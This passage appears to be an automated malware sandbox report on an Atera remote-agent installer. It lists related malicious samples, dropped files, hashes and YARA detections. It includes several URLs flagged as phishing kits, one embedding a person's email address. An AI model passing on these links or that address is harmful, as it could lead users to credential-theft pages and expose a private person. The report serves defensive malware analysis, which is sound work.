                                                                                                                                                                                                                                                                                          • 34.249.145.219
                                                                                                                                                                                                                                                                                          https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 18.239.36.13
                                                                                                                                                                                                                                                                                          https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                          • 18.245.31.89
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 99.86.8.175
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 108.138.217.58
                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 18.245.187.2
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 54.73.203.83
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.32
                                                                                                                                                                                                                                                                                          AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.38
                                                                                                                                                                                                                                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 76.76.21.98
                                                                                                                                                                                                                                                                                          zte.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 34.249.145.219
                                                                                                                                                                                                                                                                                          https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 18.239.36.13
                                                                                                                                                                                                                                                                                          https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                          • 18.245.31.89
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 99.86.8.175
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 108.138.217.58
                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 18.245.187.2
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 54.73.203.83
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.32

                                                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                            setup_north_west_arctic_borrough.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                              9rSeCZbjZE.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                TRABALHO----PROCESSO0014S55-S440000000S1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                  SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                    AdobeUpdate.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                      SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                        Y3Wvl9aYAU.cmdGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                          SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                            SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                setup_north_west_arctic_borrough.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                  9rSeCZbjZE.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                    TRABALHO----PROCESSO0014S55-S440000000S1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                      SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                        AdobeUpdate.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                          SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                            Y3Wvl9aYAU.cmdGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                              SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                                                SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msiGet hashmaliciousAteraAgentBrowse

                                                                                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                                                                                  C:\Config.Msi\44c50b.rbs

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8823
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.662722909851916
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0jWxz1ccbTOOeMek861I7r6IHfI7r6kAVv70HVotBVeZEmzmYpLAV77yXpY92r:0aD2OcpctiB2ie
                                                                                                                                                                                                                                                                                                                                  MD5:74418E934C3B421B1FA339AB6EDD0B85
                                                                                                                                                                                                                                                                                                                                  SHA1:54488E09E5238994B496B36603D0BB0470682F10
                                                                                                                                                                                                                                                                                                                                  SHA-256:7A7F45DD82706C6F6B3203FF39809F3C378CE4580D139739A20B3599C3E629FD
                                                                                                                                                                                                                                                                                                                                  SHA-512:04CFA8B459F5782833AF020F9B88EF42548C9D1584C5C8D48EE10FCB668A5BFD4CE0D3EDF21106168A87C0FFBAC68E029A17BA2DFE3F2961959C478636FECC6E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\44c50b.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent..Arquivo_4593167.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{38F0101

                                                                                                                                                                                                                                                                                                                                  C:\Config.Msi\44c50f.rbs

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):76037
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.733727884865765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:oPXeqjCyEgH2bQzxW5wM/wt/JBQKwHhrRUL2l+Jq4599oefeIubJZrQ1vMF8EkdW:NSG
                                                                                                                                                                                                                                                                                                                                  MD5:109413131C38610726E55D39A16C53E1
                                                                                                                                                                                                                                                                                                                                  SHA1:FB34F5FE6B0184A339CF34F52606CBFDDC688F21
                                                                                                                                                                                                                                                                                                                                  SHA-256:3A31E275C4A5C5FF3AB3EC7323CAD7FC26E1C6CE44871C7D5810869AA7207B11
                                                                                                                                                                                                                                                                                                                                  SHA-512:23AF03B5BE756C2F0622D4250A9883AA683694B0A3CF233C897DFD53D240B5AE0B28E4BDE6A5958B28B68787C5ABFF7C244B13D6036C8DA42C0D4D73A6D29BC7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3D8827C3-3F73-4AD7-9420-7CA93653C8F2}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{61B538AB-B209-C01B-F95C-B0A0531054D2}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{3742F778-8BAC-9729-A5BE-712DA9BEB95A}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{ADBB7064-411F-E593-D901-EACB3BA8154E}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{06653204-4010-8C69-AD0A-982273468010}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{76FB8673-364C-25A7-DEC2-3C43D0343A02}&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}.@......&.{944490A2-222A-67EA-5532-3CEF12

                                                                                                                                                                                                                                                                                                                                  C:\Config.Msi\44c511.rbs

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):464
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.223252342608367
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Ea3LMOszle/YeVugrUucQBak5cSvpL7lgYKq9uSgmll/Vnpm/nsuRYaRsjXwpohe:EgjAOBjUcBn97lghq5j//a/fNl+9W
                                                                                                                                                                                                                                                                                                                                  MD5:4D4A6DEF9D042792A9DF96C430ED72D4
                                                                                                                                                                                                                                                                                                                                  SHA1:6E28912D26961146BCC57EB7DD28CEAFB768D476
                                                                                                                                                                                                                                                                                                                                  SHA-256:DD74B1C0F1FD56400737E599FCF739021E1DB468346CBC894EE49684AF2DAC6B
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0941BF9E9EACD455CA7384E6020AF8F1760CBBAC4759E4B04FA08D571F173761FB616FCAD132367CF807D8B83298DC38BF2DE6CDE29631447A3FF6A282122F9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....Util_UpdateSetting....Util_InstSrvAndDrv....Util_InstDone...@.....@.....@....

                                                                                                                                                                                                                                                                                                                                  C:\Config.Msi\44c514.rbs

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):57458
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.864942993197669
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:DL9BRzVH/GV1a67QzE/DBFIAL1UN7Tbob0qvJWj28erEReN4CVcaf1QeLHaH8o1w:vwI5i9jW38
                                                                                                                                                                                                                                                                                                                                  MD5:AA72E47D6B5B994FCBCACBC94CCDDF11
                                                                                                                                                                                                                                                                                                                                  SHA1:0B6545323579672E1C8194B882EE75EAE8DF6404
                                                                                                                                                                                                                                                                                                                                  SHA-256:A01159ADEAE69DAB7984A8CAEB0FAC7E1E5F67708DD334540D2495BF12CFBF67
                                                                                                                                                                                                                                                                                                                                  SHA-512:36E1C1BB62C7D0F865101C64A644BCBE3E2F3CA53DE5F59A3568A8BAD4A16195074B666A618DD47573FA69FDC21E063CE0B236D5A51FCB5B5F5A0AFBA1D6C501
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}%.Microsoft .NET Runtime - 6.0.35 (x64)!.dotnet-runtime-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{76657AF8-AF4E-4FA9-9A39-80AC267D9B11}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{BCDE6883-BAB7-54AB-B504-D8C3F75FDB2A}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{F621578B-E081-5FC4-B0C5-A151B816DC51}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{B0658A77-9697-57AB-AEF0-C49F5788A264}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{120A93F0-81ED-50CA-849C-D3C267F0E1B9}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{B6486357-3BB8-567F-A403-76642301DF0F}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}.@......&.{7DD77B54-D0C8-5E10-9C80-EE381420C680}&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E

                                                                                                                                                                                                                                                                                                                                  C:\Config.Msi\44c518.rbs

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9062
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.59654785770512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:LFtGg8V0kejHptGIIxGICTBO76E6NZG6XXHws3M6p7RV/tbM7YB:LueGlGLH
                                                                                                                                                                                                                                                                                                                                  MD5:1DCF1C1B62324677C3BB537D907ACD74
                                                                                                                                                                                                                                                                                                                                  SHA1:508A9FB9129DF055935403F205C90CE755811B6D
                                                                                                                                                                                                                                                                                                                                  SHA-256:797C672C4D5B8279A82441A9A77C8BEE74D791CE49EC460DAFF94B99BD3ADD8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F93FF05B475B0D44D2F8ECEA819944B1DB56AA19B790A6E4EFBFECED066A90CE3FBB607C85049B8ED1566F897484BCBA96999A9033E9969E52203C2AD9FC961C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}..Microsoft .NET Host FX Resolver - 6.0.35 (x64)!.dotnet-hostfxr-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{4E46258D-E612-40D6-A98B-8F64771E3561}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E3262256-B959-50C5-91BD-D2C1656236F1}&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}.@......&.{B59DD035-01D3-57CD-A06D-224838439FEA}&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}.@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..(.C:\Program Files\dotnet\host\fxr\6.0.35\....3.C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dll....WriteRegistryValues..Writing system registry values..Key:

                                                                                                                                                                                                                                                                                                                                  C:\Config.Msi\44c51c.rbs

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.646671354105339
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:k3qLUB71Ew8lnfseOtRIImRI9OE5Bai6pe:kdB71Ew6MRaRxS
                                                                                                                                                                                                                                                                                                                                  MD5:E1CC6FA2AB8AC2FABA2246D0D70D68FE
                                                                                                                                                                                                                                                                                                                                  SHA1:488F593D1C919DF4F2DB762CF25E6EA5D45E4120
                                                                                                                                                                                                                                                                                                                                  SHA-256:08E94A11EDEB136B200C7D771E46A3A8945D93FE08184E29913FED2CF457A717
                                                                                                                                                                                                                                                                                                                                  SHA-512:890F08204E8CA34C4A457357A16A44FCF7F81F4A7F03619BB830016FCF66BFD3F58A257C5A2D3DE400A9AB7D58512DD43DF657F1D8F7788A356AE41649ECB7DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}".Microsoft .NET Host - 6.0.35 (x64)..dotnet-host-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{CE35924C-AD31-51DF-B84A-A8052ED08400}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@......&.{A61CBE5B-1282-4F29-90AD-63597AA2372E}&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}.@....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):753
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                                                                                  MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                                                                                  SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                                                                                  SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                                                                                  SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):7466
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                                                                                  MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                                                                                  SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                                                                                  SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                                                                                  SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):145968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                                                                  MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                                                                  SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                                                                  SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
